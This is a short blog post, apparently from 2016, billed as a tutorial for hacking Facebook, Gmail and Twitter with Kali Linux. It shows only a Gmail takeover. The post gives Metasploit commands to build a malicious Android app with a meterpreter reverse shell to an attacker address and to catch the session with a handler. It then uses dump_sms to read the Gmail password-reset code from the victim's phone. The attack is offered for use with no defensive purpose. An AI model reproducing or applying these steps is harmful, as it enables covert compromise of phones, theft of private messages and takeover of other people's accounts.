Total Pageviews

Monday, December 19, 2016

Hack Facebook, Gmail and Twitter with KALI linux

Here We Start Our Smartphone Hacking Tutorial

At first we need to create a malicious android application for hack any type of android phone.Open up the terminal and Type Following Command
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > MaliciousApp.apk
After Creating the malicious android application Start the metasploit using below command:
msfconsole
Now run the exploit to get the multiple session in device using below command:
use exploit/multi/handler
 After exploiting the smartphone,Now generate the payload which provide reverse connection from victim smartphone to attacker
set payload android/meterpreter/reverse_tcp
Then set the LHOST and LPORT using below command
Set LHOST=192.168.0.4
Set LPORT=81
Now enter the command to run the exploit
EXPLOIT
As and when victim install the malicious application,attacker get the meterpreter session of victim smartphone as show in below image:



After hacking the android smartphone,Now follow the 5 simple steps to hack the gmail account of victim:

1.Go to www.gmail.com and click on "Need help?" as shown in below image:

2.Now attacker see 3 options,just select first option “I don’t know my password” and put this victim account that attacker want to hack.

3.Now gmail ask victim to "Enter the last password you remember",just click on “I don’t know”

4.Now there have a option,this option have a hidden phone number that provided by victim.select “a text message (SMS)” and click on Continue as shown below:


5.Now open the previous meterpreter session terminal and type below command to get the dump of text message:
dump_sms


You see all of the message that have on this phone using above command,Now put this google verification code from this message and click on continue.

Done...

No comments:

Post a Comment

Popular Posts